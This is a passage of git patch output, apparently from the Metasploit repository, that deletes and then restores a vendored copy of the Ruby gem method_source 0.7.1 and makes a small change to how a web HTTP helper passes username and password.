PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown deleted file mode 100644 index d91b810a3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown +++ /dev/null @@ -1,91 +0,0 @@ -method_source -============= - -(C) John Mair (banisterfiend) 2011 - -_retrieve the sourcecode for a method_ - -*NOTE:* This simply utilizes `Method#source_location`; it - does not access the live AST. - -`method_source` is a utility to return a method's sourcecode as a -Ruby string. Also returns `Proc` and `Lambda` sourcecode. - -Method comments can also be extracted using the `comment` method. - -It is written in pure Ruby (no C). - -* Some Ruby 1.8 support now available. -* Support for MRI, RBX, JRuby, REE - -`method_source` provides the `source` and `comment` methods to the `Method` and -`UnboundMethod` and `Proc` classes. - -* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` -* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) -* See the [source code](http://github.com/banister/method_source) - -Example: display method source ------------------------------- - - Set.instance_method(:merge).source.display - # => - def merge(enum) - if enum.instance_of?(self.class) - @hash.update(enum.instance_variable_get(:@hash)) - else - do_with_enum(enum) { |o| add(o) } - end - - self - end - -Example: display method comments --------------------------------- - - Set.instance_method(:merge).comment.display - # => - # Merges the elements of the given enumerable object to the set and - # returns self. - -Limitations: ------------- - -* Occasional strange behaviour in Ruby 1.8 -* Cannot return source for C methods. -* Cannot return source for dynamically defined methods. - -Special Thanks --------------- - -[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. - -[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. - -[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. - -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile deleted file mode 100644 index 92c0234f3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile +++ /dev/null @@ -1,76 +0,0 @@ -dlext = Config::CONFIG['DLEXT'] -direc = File.dirname(__FILE__) - -require 'rake/clean' -require 'rake/gempackagetask' -require "#{direc}/lib/method_source/version" - -CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") -CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", - "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", - "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") - -def apply_spec_defaults(s) - s.name = "method_source" - s.summary = "retrieve the sourcecode for a method" - s.version = MethodSource::VERSION - s.date = Time.now.strftime '%Y-%m-%d' - s.author = "John Mair (banisterfiend)" - s.email = 'jrmair@gmail.com' - s.description = s.summary - s.require_path = 'lib' - - s.add_development_dependency("bacon","~>1.1.0") - s.add_development_dependency("rake", "~>0.9") - s.homepage = "http://banisterfiend.wordpress.com" - s.has_rdoc = 'yard' - s.files = `git ls-files`.split("\n") - s.test_files = `git ls-files -- test/*`.split("\n") -end - -task :test do - sh "bacon -q #{direc}/test/test.rb" -end - -desc "reinstall gem" -task :reinstall => :gems do - sh "gem uninstall method_source" rescue nil - sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" -end - -desc "Set up and run tests" -task :default => [:test] - -namespace :ruby do - spec = Gem::Specification.new do |s| - apply_spec_defaults(s) - s.platform = Gem::Platform::RUBY - end - - Rake::GemPackageTask.new(spec) do |pkg| - pkg.need_zip = false - pkg.need_tar = false - end - - desc "Generate gemspec file" - task :gemspec do - File.open("#{spec.name}.gemspec", "w") do |f| - f << spec.to_ruby - end - end -end - -desc "build all platform gems at once" -task :gems => [:rmgems, "ruby:gem"] - -desc "remove all platform gems" -task :rmgems => ["ruby:clobber_package"] - -desc "build and push latest gems" -task :pushgems => :gems do - chdir("#{direc}/pkg") do - Dir["*.gem"].each do |gemfile| - sh "gem push #{gemfile}" - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb deleted file mode 100644 index 9a3c325f75..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb +++ /dev/null @@ -1,163 +0,0 @@ -# (C) John Mair (banisterfiend) 2011 -# MIT License - -direc = File.dirname(__FILE__) - -require "#{direc}/method_source/version" -require "#{direc}/method_source/source_location" - -module MethodSource - # Determine if a string of code is a valid Ruby expression. - # @param [String] code The code to validate. - # @return [Boolean] Whether or not the code is a valid Ruby expression. - # @example - # valid_expression?("class Hello") #=> false - # valid_expression?("class Hello; end") #=> true - def self.valid_expression?(str) - if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ - Rubinius::Melbourne19.parse_string(str) - elsif defined?(Rubinius::Melbourne) - Rubinius::Melbourne.parse_string(str) - else - catch(:valid) { - eval("BEGIN{throw :valid}\n#{str}") - } - end - true - rescue SyntaxError - false - end - - # Helper method responsible for extracting method body. - # Defined here to avoid polluting `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [File] The opened source file - def self.source_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - (line - 1).times { file.readline } - - code = "" - loop do - val = file.readline - code << val - - return code if valid_expression?(code) - end - end - end - - # Helper method responsible for opening source file and buffering up - # the comments for a specified method. Defined here to avoid polluting - # `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [String] The comments up to the point of the method. - def self.comment_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - buffer = "" - (line - 1).times do - line = file.readline - # Add any line that is a valid ruby comment, - # but clear as soon as we hit a non comment line. - if (line =~ /^\s*#/) || (line =~ /^\s*$/) - buffer << line.lstrip - else - buffer.replace("") - end - end - - buffer - end - end - - # This module is to be included by `Method` and `UnboundMethod` and - # provides the `#source` functionality - module MethodExtensions - - # We use the included hook to patch Method#source on rubinius. - # We need to use the included hook as Rubinius defines a `source` - # on Method so including a module will have no effect (as it's - # higher up the MRO). - # @param [Class] klass The class that includes the module. - def self.included(klass) - if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && - RUBY_ENGINE =~ /rbx/ - - klass.class_eval do - orig_source = instance_method(:source) - - define_method(:source) do - begin - super - rescue - orig_source.bind(self).call - end - end - - end - end - end - - # Return the sourcecode for the method as a string - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method sourcecode as a string - # @example - # Set.instance_method(:clear).source.display - # => - # def clear - # @hash.clear - # self - # end - def source - if respond_to?(:source_location) - source = MethodSource.source_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !source - else - raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" - end - - source - end - - # Return the comments associated with the method as a string. - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method's comments as a string - # @example - # Set.instance_method(:clear).comment.display - # => - # # Removes all elements and returns self. - def comment - if respond_to?(:source_location) - comment = MethodSource.comment_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !comment - else - raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" - end - - comment - end - end -end - -class Method - include MethodSource::SourceLocation::MethodExtensions - include MethodSource::MethodExtensions -end - -class UnboundMethod - include MethodSource::SourceLocation::UnboundMethodExtensions - include MethodSource::MethodExtensions -end - -class Proc - include MethodSource::SourceLocation::ProcExtensions - include MethodSource::MethodExtensions -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb deleted file mode 100644 index 9161854819..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb +++ /dev/null @@ -1,138 +0,0 @@ -module MethodSource - module ReeSourceLocation - # Ruby enterprise edition provides all the information that's - # needed, in a slightly different way. - def source_location - [__file__, __line__] rescue nil - end - end - - module SourceLocation - module MethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - else - - - def trace_func(event, file, line, id, binding, classname) - return unless event == 'call' - set_trace_func nil - - @file, @line = file, line - raise :found - end - - private :trace_func - - # Return the source location of a method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - if @file.nil? - args =[*(1..(arity<-1 ? -arity-1 : arity ))] - - set_trace_func method(:trace_func).to_proc - call(*args) rescue nil - set_trace_func nil - @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) - end - return [@file, @line] if File.exist?(@file.to_s) - end - end - end - - module ProcExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ - - # Return the source location for a Proc (Rubinius only) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - [block.file.to_s, block.line] - end - else - - # Return the source location for a Proc (in implementations - # without Proc#source_location) - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # proc definition is found. - def source_location - self.to_s =~ /@(.*):(\d+)/ - [$1, $2.to_i] - end - end - end - - module UnboundMethodExtensions - if Proc.method_defined? :__file__ - include ReeSourceLocation - - elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ - require 'java' - - # JRuby version source_location hack - # @return [Array] A two element array containing the source location of the method - def source_location - to_java.source_location(Thread.current.to_java.getContext()) - end - - else - - - # Return the source location of an instance method for Ruby 1.8. - # @return [Array] A two element array. First element is the - # file, second element is the line in the file where the - # method definition is found. - def source_location - klass = case owner - when Class - owner - when Module - method_owner = owner - Class.new { include(method_owner) } - end - - # deal with immediate values - case - when klass == Symbol - return :a.method(name).source_location - when klass == Fixnum - return 0.method(name).source_location - when klass == TrueClass - return true.method(name).source_location - when klass == FalseClass - return false.method(name).source_location - when klass == NilClass - return nil.method(name).source_location - end - - begin - Object.instance_method(:method).bind(klass.allocate).call(name).source_location - rescue TypeError - - # Assume we are dealing with a Singleton Class: - # 1. Get the instance object - # 2. Forward the source_location lookup to the instance - instance ||= ObjectSpace.each_object(owner).first - Object.instance_method(:method).bind(instance).call(name).source_location - end - end - end - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb deleted file mode 100644 index b8142bfaef..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb +++ /dev/null @@ -1,3 +0,0 @@ -module MethodSource - VERSION = "0.7.1" -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec deleted file mode 100644 index 83a727d6f6..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec +++ /dev/null @@ -1,33 +0,0 @@ -# -*- encoding: utf-8 -*- - -Gem::Specification.new do |s| - s.name = "method_source" - s.version = "0.7.0" - - s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= - s.authors = ["John Mair (banisterfiend)"] - s.date = "2012-01-01" - s.description = "retrieve the sourcecode for a method" - s.email = "jrmair@gmail.com" - s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] - s.homepage = "http://banisterfiend.wordpress.com" - s.require_paths = ["lib"] - s.rubygems_version = "1.8.10" - s.summary = "retrieve the sourcecode for a method" - s.test_files = ["test/test.rb", "test/test_helper.rb"] - - if s.respond_to? :specification_version then - s.specification_version = 3 - - if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, ["~> 1.1.0"]) - s.add_development_dependency(%q, ["~> 0.9"]) - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end - else - s.add_dependency(%q, ["~> 1.1.0"]) - s.add_dependency(%q, ["~> 0.9"]) - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb deleted file mode 100644 index 425e56acf9..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb +++ /dev/null @@ -1,122 +0,0 @@ -direc = File.dirname(__FILE__) - -require 'rubygems' -require 'bacon' -require "#{direc}/../lib/method_source" -require "#{direc}/test_helper" - -describe MethodSource do - - describe "source_location (testing 1.8 implementation)" do - it 'should return correct source_location for a method' do - method(:hello).source_location.first.should =~ /test_helper/ - end - - it 'should not raise for immediate instance methods' do - [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| - lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise - end - end - - it 'should not raise for immediate methods' do - [:a, 1, true, false, nil].each do |immediate| - lambda { immediate.method(:to_s).source_location }.should.not.raise - end - end - end - - before do - @hello_module_source = " def hello; :hello_module; end\n" - @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" - @hello_source = "def hello; :hello; end\n" - @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" - @lambda_comment = "# This is a comment for MyLambda\n" - @lambda_source = "MyLambda = lambda { :lambda }\n" - @proc_source = "MyProc = Proc.new { :proc }\n" - end - - it 'should define methods on Method and UnboundMethod and Proc' do - Method.method_defined?(:source).should == true - UnboundMethod.method_defined?(:source).should == true - Proc.method_defined?(:source).should == true - end - - describe "Methods" do - it 'should return source for method' do - method(:hello).source.should == @hello_source - end - - it 'should return source for a method defined in a module' do - M.instance_method(:hello).source.should == @hello_module_source - end - - it 'should return source for a singleton method as an instance method' do - class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source - end - - it 'should return source for a singleton method' do - $o.method(:hello).source.should == @hello_singleton_source - end - - - it 'should return a comment for method' do - method(:hello).comment.should == @hello_comment - end - - - if !is_rbx? - it 'should raise for C methods' do - lambda { method(:puts).source }.should.raise RuntimeError - end - end - end - - # if RUBY_VERSION =~ /1.9/ || is_rbx? - describe "Lambdas and Procs" do - it 'should return source for proc' do - MyProc.source.should == @proc_source - end - - it 'should return an empty string if there is no comment' do - MyProc.comment.should == '' - end - - it 'should return source for lambda' do - MyLambda.source.should == @lambda_source - end - - it 'should return comment for lambda' do - MyLambda.comment.should == @lambda_comment - end - end - # end - describe "Comment tests" do - before do - @comment1 = "# a\n# b\n" - @comment2 = "# a\n# b\n" - @comment3 = "# a\n#\n# b\n" - @comment4 = "# a\n# b\n" - @comment5 = "# a\n# b\n# c\n# d\n" - end - - it "should correctly extract multi-line comments" do - method(:comment_test1).comment.should == @comment1 - end - - it "should correctly strip leading whitespace before comments" do - method(:comment_test2).comment.should == @comment2 - end - - it "should keep empty comment lines" do - method(:comment_test3).comment.should == @comment3 - end - - it "should ignore blank lines between comments" do - method(:comment_test4).comment.should == @comment4 - end - - it "should align all comments to same indent level" do - method(:comment_test5).comment.should == @comment5 - end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb deleted file mode 100644 index 53da4e519c..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb +++ /dev/null @@ -1,50 +0,0 @@ -def is_rbx? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ -end - -def jruby? - defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ -end - - -module M - def hello; :hello_module; end -end - -$o = Object.new -def $o.hello; :hello_singleton; end - -# A comment for hello - - # It spans two lines and is indented by 2 spaces -def hello; :hello; end - -# a -# b -def comment_test1; end - - # a - # b -def comment_test2; end - -# a -# -# b -def comment_test3; end - -# a - -# b -def comment_test4; end - - -# a - # b - # c -# d -def comment_test5; end - -# This is a comment for MyLambda -MyLambda = lambda { :lambda } -MyProc = Proc.new { :proc } - diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 2ad3dbcb19..00ee6c1e5b 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -107,6 +107,7 @@ class Auxiliary::Web::HTTP {}, opts[:target].ssl, 'SSLv23', + nil, username, password ) @@ -299,10 +300,8 @@ class Auxiliary::Web::HTTP opts['data'] = body if body c = connect - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end + c.username = username + c.password = password Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out From 1407886e83a5427388f3c8046337df0bfea85fd7 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 5 Mar 2013 12:34:51 -0600 Subject: [PATCH 78/87] Revert "fix a major typo snaffu" This reverts commit c639de7ccc2806110e30530aec1a689a8b293964. --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 ++ .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 + .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 + .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 +++ .../gems/method_source-0.7.1/README.markdown | 91 ++++++++++ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ++++++++ .../method_source-0.7.1/lib/method_source.rb | 163 ++++++++++++++++++ .../lib/method_source/source_location.rb | 138 +++++++++++++++ .../lib/method_source/version.rb | 3 + .../method_source-0.7.1/method_source.gemspec | 33 ++++ .../gems/method_source-0.7.1/test/test.rb | 122 +++++++++++++ .../method_source-0.7.1/test/test_helper.rb | 50 ++++++ lib/msf/core/auxiliary/web/http.rb | 7 +- 14 files changed, 725 insertions(+), 3 deletions(-) create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml new file mode 100644 index 0000000000..ba51bba6b2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml @@ -0,0 +1,17 @@ +rvm: + - 1.8.7 + - 1.9.2 + - 1.9.3 + - ree + - rbx-18mode + - rbx-19mode + - jruby + +notifications: + irc: "irc.freenode.org#pry" + recipients: + - jrmair@gmail.com + +branches: + only: + - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts new file mode 100644 index 0000000000..a4e7838016 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts @@ -0,0 +1 @@ +-m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile new file mode 100644 index 0000000000..e45e65f871 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile @@ -0,0 +1,2 @@ +source :rubygems +gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE new file mode 100644 index 0000000000..d1a50d62d0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE @@ -0,0 +1,25 @@ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown new file mode 100644 index 0000000000..d91b810a3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown @@ -0,0 +1,91 @@ +method_source +============= + +(C) John Mair (banisterfiend) 2011 + +_retrieve the sourcecode for a method_ + +*NOTE:* This simply utilizes `Method#source_location`; it + does not access the live AST. + +`method_source` is a utility to return a method's sourcecode as a +Ruby string. Also returns `Proc` and `Lambda` sourcecode. + +Method comments can also be extracted using the `comment` method. + +It is written in pure Ruby (no C). + +* Some Ruby 1.8 support now available. +* Support for MRI, RBX, JRuby, REE + +`method_source` provides the `source` and `comment` methods to the `Method` and +`UnboundMethod` and `Proc` classes. + +* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` +* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) +* See the [source code](http://github.com/banister/method_source) + +Example: display method source +------------------------------ + + Set.instance_method(:merge).source.display + # => + def merge(enum) + if enum.instance_of?(self.class) + @hash.update(enum.instance_variable_get(:@hash)) + else + do_with_enum(enum) { |o| add(o) } + end + + self + end + +Example: display method comments +-------------------------------- + + Set.instance_method(:merge).comment.display + # => + # Merges the elements of the given enumerable object to the set and + # returns self. + +Limitations: +------------ + +* Occasional strange behaviour in Ruby 1.8 +* Cannot return source for C methods. +* Cannot return source for dynamically defined methods. + +Special Thanks +-------------- + +[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. + +[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. + +[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. + +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile new file mode 100644 index 0000000000..92c0234f3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile @@ -0,0 +1,76 @@ +dlext = Config::CONFIG['DLEXT'] +direc = File.dirname(__FILE__) + +require 'rake/clean' +require 'rake/gempackagetask' +require "#{direc}/lib/method_source/version" + +CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") +CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", + "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", + "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") + +def apply_spec_defaults(s) + s.name = "method_source" + s.summary = "retrieve the sourcecode for a method" + s.version = MethodSource::VERSION + s.date = Time.now.strftime '%Y-%m-%d' + s.author = "John Mair (banisterfiend)" + s.email = 'jrmair@gmail.com' + s.description = s.summary + s.require_path = 'lib' + + s.add_development_dependency("bacon","~>1.1.0") + s.add_development_dependency("rake", "~>0.9") + s.homepage = "http://banisterfiend.wordpress.com" + s.has_rdoc = 'yard' + s.files = `git ls-files`.split("\n") + s.test_files = `git ls-files -- test/*`.split("\n") +end + +task :test do + sh "bacon -q #{direc}/test/test.rb" +end + +desc "reinstall gem" +task :reinstall => :gems do + sh "gem uninstall method_source" rescue nil + sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" +end + +desc "Set up and run tests" +task :default => [:test] + +namespace :ruby do + spec = Gem::Specification.new do |s| + apply_spec_defaults(s) + s.platform = Gem::Platform::RUBY + end + + Rake::GemPackageTask.new(spec) do |pkg| + pkg.need_zip = false + pkg.need_tar = false + end + + desc "Generate gemspec file" + task :gemspec do + File.open("#{spec.name}.gemspec", "w") do |f| + f << spec.to_ruby + end + end +end + +desc "build all platform gems at once" +task :gems => [:rmgems, "ruby:gem"] + +desc "remove all platform gems" +task :rmgems => ["ruby:clobber_package"] + +desc "build and push latest gems" +task :pushgems => :gems do + chdir("#{direc}/pkg") do + Dir["*.gem"].each do |gemfile| + sh "gem push #{gemfile}" + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb new file mode 100644 index 0000000000..9a3c325f75 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb @@ -0,0 +1,163 @@ +# (C) John Mair (banisterfiend) 2011 +# MIT License + +direc = File.dirname(__FILE__) + +require "#{direc}/method_source/version" +require "#{direc}/method_source/source_location" + +module MethodSource + # Determine if a string of code is a valid Ruby expression. + # @param [String] code The code to validate. + # @return [Boolean] Whether or not the code is a valid Ruby expression. + # @example + # valid_expression?("class Hello") #=> false + # valid_expression?("class Hello; end") #=> true + def 